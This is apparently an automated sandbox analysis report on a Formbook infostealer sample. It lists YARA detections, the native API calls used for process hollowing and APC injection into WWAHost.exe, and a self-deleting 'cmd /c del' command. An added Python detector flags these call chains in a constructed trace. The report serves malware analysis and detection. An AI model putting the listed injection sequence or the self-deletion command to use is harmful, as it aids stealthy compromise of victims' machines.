          Source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_00406354
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_00404802
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_00406B2B
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_72915CF1
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_72915CE2
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041C8F4
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041B8B3
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041C266
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004012FB
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00408C6B
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00408C70
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041C431
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB20A0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9B090
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C528EC
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C520A8
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C41002
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C5E824
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BA4120
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B8F900
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C522AE
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BBEBB0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4DBD2
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C52B28
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C4D466
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9841F
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C525DD
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BB2581
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B9D5E0
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C51D55
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00B80D20
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00C52D07
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387EBB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03866E30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384F900
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03840D20
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03864120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03911D55
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385B090
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901002
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385841F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057C8F4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057B8B3
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057C266
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00568C70
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00568C6B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057C431
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00562D90
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00562FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 0384B150 appears 32 times
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: String function: 00B8B150 appears 34 times
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00418700 NtClose,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004187B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004185CA NtCreateFile,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00418622 NtCreateFile,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004186FA NtClose,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004187AA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BCB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BCA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BCAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BC9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038896D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038896E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038899A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038895D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038897A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0388A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0388A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0388A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038899D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038895F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0388AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889560 NtWriteFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038898A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038898F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03889820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0388B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_005785D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00578680 NtReadFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00578700 NtClose,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_005787B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_005785CA NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00578622 NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_005786FA NtClose,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_005787AA NtAllocateVirtualMemory,
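The native-call list above is what a process-hollowing / APC-injection chain looks like once the payload resolves its own Nt* stubs: NtCreateProcessEx, NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtQueueApcThread and NtResumeThread are all present in both the first stage and the WWAHost.exe stage. None of these calls is suspicious on its own; the signal is the ordered chain inside one process. The following Python is an added example (it is not the sandbox's own detection code) that runs that ordered-subsequence check over a constructed (pid, api) trace shaped like the report's findings; the trace format, pids and technique step lists are assumptions for the example.

```python
"""Flag process-hollowing / APC-injection call chains in a per-process API trace.

Added example (not part of the sandbox report). Each technique is an ordered
list of steps; a step is satisfied by any of the listed API names, and other
calls may be interleaved between steps. The trace below is constructed.
"""
from collections import defaultdict
from typing import Dict, Iterable, List, Sequence, Set, Tuple

# Technique definitions (assumed for the example): each step is a set of
# acceptable API names and steps must be hit in order within one process.
TECHNIQUES: Dict[str, Sequence[Set[str]]] = {
    "process_hollowing": (
        {"NtCreateProcessEx", "NtCreateUserProcess", "CreateProcessInternalW"},
        {"NtUnmapViewOfSection"},
        {"NtAllocateVirtualMemory", "NtMapViewOfSection"},
        {"NtWriteVirtualMemory"},
        {"NtSetContextThread"},
        {"NtResumeThread"},
    ),
    "apc_injection": (
        {"NtAllocateVirtualMemory", "NtMapViewOfSection"},
        {"NtWriteVirtualMemory"},
        {"NtQueueApcThread"},
        {"NtResumeThread", "NtAlertResumeThread"},
    ),
}


def matches_in_order(steps: Sequence[Set[str]], calls: Iterable[str]) -> bool:
    """True if every step is satisfied by a call later than the previous step's match."""
    it = iter(calls)
    for step in steps:
        # any() advances the shared iterator up to and including the matching call
        if not any(call in step for call in it):
            return False
    return True


def detect(trace: Iterable[Tuple[int, str]]) -> Dict[int, List[str]]:
    """Group a (pid, api) trace by pid and return the techniques each pid matches."""
    per_pid: Dict[int, List[str]] = defaultdict(list)
    for pid, api in trace:
        per_pid[pid].append(api)
    hits: Dict[int, List[str]] = {}
    for pid, calls in per_pid.items():
        found = [name for name, steps in TECHNIQUES.items() if matches_in_order(steps, calls)]
        if found:
            hits[pid] = found
    return hits


# Constructed trace: pid 1 is a first stage creating a suspended copy of itself
# and hollowing it; pid 7 is an injected host stage queueing an APC; pid 9 is
# noise that touches some of the same APIs but never in a complete chain.
SAMPLE_TRACE: List[Tuple[int, str]] = [
    (1, "NtCreateFile"), (1, "NtCreateProcessEx"), (1, "NtUnmapViewOfSection"),
    (1, "NtAllocateVirtualMemory"), (1, "NtWriteVirtualMemory"),
    (1, "NtGetContextThread"), (1, "NtSetContextThread"), (1, "NtResumeThread"),
    (7, "NtMapViewOfSection"), (7, "NtWriteVirtualMemory"), (7, "NtQueueApcThread"),
    (7, "NtResumeThread"),
    (9, "NtCreateFile"), (9, "NtWriteVirtualMemory"), (9, "NtResumeThread"),
]

if __name__ == "__main__":
    for pid, techniques in sorted(detect(SAMPLE_TRACE).items()):
        print(f"pid {pid}: {', '.join(techniques)}")
```

The subsequence check deliberately tolerates interleaved calls (the report shows NtGetContextThread between the write and NtSetContextThread) but refuses out-of-order chains, which keeps a process that merely calls NtWriteVirtualMemory and NtResumeThread (pid 9 above) out of the hits.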
          Source: DN_467842234567.exe, 00000000.00000003.671874971.000000000EA76000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DN_467842234567.exe
          Source: DN_467842234567.exe, 00000001.00000002.734746634.0000000000B16000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs DN_467842234567.exe
          Source: DN_467842234567.exe, 00000001.00000002.735470838.0000000000C7F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DN_467842234567.exe
          Source: DN_467842234567.exeReversingLabs: Detection: 64%
Source: C:\Users\user\Desktop\DN_467842234567.exeFile read: C:\Users\user\Desktop\DN_467842234567.exe
          Source: DN_467842234567.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DN_467842234567.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\DN_467842234567.exe 'C:\Users\user\Desktop\DN_467842234567.exe'
          Source: C:\Users\user\Desktop\DN_467842234567.exeProcess created: C:\Users\user\Desktop\DN_467842234567.exe 'C:\Users\user\Desktop\DN_467842234567.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DN_467842234567.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DN_467842234567.exeProcess created: C:\Users\user\Desktop\DN_467842234567.exe 'C:\Users\user\Desktop\DN_467842234567.exe'
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DN_467842234567.exe'
          Source: C:\Users\user\Desktop\DN_467842234567.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\DN_467842234567.exeFile created: C:\Users\user\AppData\Local\Temp\nslF1B.tmp
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@13/6
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,
Source: C:\Users\user\Desktop\DN_467842234567.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_01
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Binary string: WWAHost.pdb source: DN_467842234567.exe, 00000001.00000002.734645051.0000000000A60000.00000040.00020000.sdmp
